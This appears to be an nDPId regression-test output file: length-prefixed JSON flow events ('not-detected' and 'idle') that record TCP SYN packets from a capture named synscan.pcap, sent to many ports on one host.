+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 